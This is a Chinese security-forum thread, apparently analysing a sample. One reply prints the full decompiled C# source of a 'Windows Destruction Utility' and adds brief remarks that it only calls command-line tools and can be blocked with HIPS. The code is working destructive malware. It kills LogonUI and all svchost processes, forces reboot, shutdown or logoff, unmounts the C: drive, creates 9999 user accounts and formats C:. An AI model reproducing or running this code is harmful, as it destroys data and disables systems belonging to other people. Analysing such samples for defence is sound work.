本帖最后由 a27573 于 2020-4-10 10:52 编辑
解除挂载C盘
不过没有手动操作/被利用是没有破坏性的
- using System;
- using System.Diagnostics;
- using Microsoft.VisualBasic.CompilerServices;
- namespace wdutil
- {
- // Token: 0x02000008 RID: 8
- [StandardModule]
- internal sealed class Module1
- {
- // Token: 0x06000010 RID: 16 RVA: 0x000021CC File Offset: 0x000003CC
- [STAThread]
- public static void Main()
- {
- Console.Title = "Windows Destruction Utility";
- Console.WriteLine("Windows Destruction Utility");
- Console.WriteLine("Type "help" to see a list of commands.");
- Console.WriteLine();
- Console.WriteLine("For some commands you will need administrator permissions.");
- Console.WriteLine();
- Module1.promptp();
- }
- // Token: 0x06000011 RID: 17 RVA: 0x00002218 File Offset: 0x00000418
- public static void promptp()
- {
- Console.Write("wdutil> ");
- Module1.prompt = Console.ReadLine();
- Module1.cm();
- }
- // Token: 0x06000012 RID: 18 RVA: 0x00002238 File Offset: 0x00000438
- public static void cm()
- {
- checked
- {
- try
- {
- bool flag = Operators.ConditionalCompareObjectEqual(Module1.prompt, "help", false);
- if (flag)
- {
- Console.WriteLine("klu - Kills the LogonUI process");
- Console.WriteLine("reboot - Emergency reboot");
- Console.WriteLine("shutdown - Emergency shutdown");
- Console.WriteLine("logoff - Emergency logoff");
- Console.WriteLine("svchostk - Kill all svchost processes");
- Console.WriteLine("unmc - Unmounts the C:\\ drive");
- Console.WriteLine("nu - Creates 9999 users");
- Console.WriteLine("fc - Formats C:");
- }
- else
- {
- bool flag2 = Operators.ConditionalCompareObjectEqual(Module1.prompt, "klu", false);
- if (flag2)
- {
- Process[] processesByName = Process.GetProcessesByName("LogonUI");
- for (int i = 0; i < processesByName.Length; i++)
- {
- Module1.p = processesByName[i];
- Module1.p.Kill();
- }
- }
- else
- {
- bool flag3 = Operators.ConditionalCompareObjectEqual(Module1.prompt, "reboot", false);
- if (flag3)
- {
- Module1.p.StartInfo.FileName = "shutdown";
- Module1.p.StartInfo.Arguments = "-r -t 0";
- Module1.p.StartInfo.UseShellExecute = false;
- Module1.p.StartInfo.RedirectStandardOutput = true;
- Module1.p.Start();
- Console.WriteLine(Module1.p.StandardOutput.ReadToEnd());
- Module1.p.WaitForExit();
- }
- else
- {
- bool flag4 = Operators.ConditionalCompareObjectEqual(Module1.prompt, "shutdown", false);
- if (flag4)
- {
- Module1.p.StartInfo.FileName = "shutdown";
- Module1.p.StartInfo.Arguments = "-s -t 0";
- Module1.p.StartInfo.UseShellExecute = false;
- Module1.p.StartInfo.RedirectStandardOutput = true;
- Module1.p.Start();
- Console.WriteLine(Module1.p.StandardOutput.ReadToEnd());
- Module1.p.WaitForExit();
- }
- else
- {
- bool flag5 = Operators.ConditionalCompareObjectEqual(Module1.prompt, "logoff", false);
- if (flag5)
- {
- Module1.p.StartInfo.FileName = "shutdown";
- Module1.p.StartInfo.Arguments = "-l -t 0";
- Module1.p.StartInfo.UseShellExecute = false;
- Module1.p.StartInfo.RedirectStandardOutput = true;
- Module1.p.Start();
- Console.WriteLine(Module1.p.StandardOutput.ReadToEnd());
- Module1.p.WaitForExit();
- }
- else
- {
- bool flag6 = Operators.ConditionalCompareObjectEqual(Module1.prompt, "svchostk", false);
- if (flag6)
- {
- Process[] processesByName2 = Process.GetProcessesByName("svchost");
- for (int j = 0; j < processesByName2.Length; j++)
- {
- Module1.p = processesByName2[j];
- Module1.p.Kill();
- }
- }
- else
- {
- bool flag7 = Operators.ConditionalCompareObjectEqual(Module1.prompt, "unmc", false);
- if (flag7)
- {
- Module1.p.StartInfo.FileName = "mountvol";
- Module1.p.StartInfo.Arguments = "C: /d";
- Module1.p.StartInfo.UseShellExecute = false;
- Module1.p.StartInfo.RedirectStandardOutput = true;
- Module1.p.Start();
- Console.WriteLine(Module1.p.StandardOutput.ReadToEnd());
- Module1.p.WaitForExit();
- }
- else
- {
- bool flag8 = Operators.ConditionalCompareObjectEqual(Module1.prompt, "nu", false);
- if (flag8)
- {
- for (;;)
- {
- bool flag9 = Operators.ConditionalCompareObjectEqual(Module1.val1, 9999, false);
- if (flag9)
- {
- break;
- }
- Module1.p.StartInfo.FileName = "net";
- Module1.p.StartInfo.Arguments = "user " + Module1.val1.ToString() + " /add";
- Module1.p.StartInfo.UseShellExecute = false;
- Module1.p.StartInfo.RedirectStandardOutput = true;
- Module1.p.Start();
- Console.WriteLine(Module1.p.StandardOutput.ReadToEnd());
- Module1.p.WaitForExit();
- Module1.val1 = Operators.AddObject(Module1.val1, 1);
- }
- }
- else
- {
- bool flag10 = Operators.ConditionalCompareObjectEqual(Module1.prompt, "fc", false);
- if (flag10)
- {
- Module1.p.StartInfo.FileName = "format";
- Module1.p.StartInfo.Arguments = "C:";
- Module1.p.StartInfo.UseShellExecute = false;
- Module1.p.StartInfo.RedirectStandardOutput = true;
- Module1.p.Start();
- Console.WriteLine(Module1.p.StandardOutput.ReadToEnd());
- Module1.p.WaitForExit();
- }
- }
- }
- }
- }
- }
- }
- }
- }
- }
- catch (Exception ex)
- {
- Console.WriteLine("Error: " + ex.Message);
- }
- Module1.promptp();
- }
- }
- // Token: 0x04000008 RID: 8
- private static object prompt;
- // Token: 0x04000009 RID: 9
- private static Process p = new Process();
- // Token: 0x0400000A RID: 10
- private static object val1 = 1;
- }
- }
就是调用一下命令行而已。。。
@QVM360
卡饭的代码显示真是。。。
想要拦截的话得设置HIPS(火绒的系统加固也许可以试试)
|
楼主: QVM360
发表于 2020-4-10 10:22:43
楼主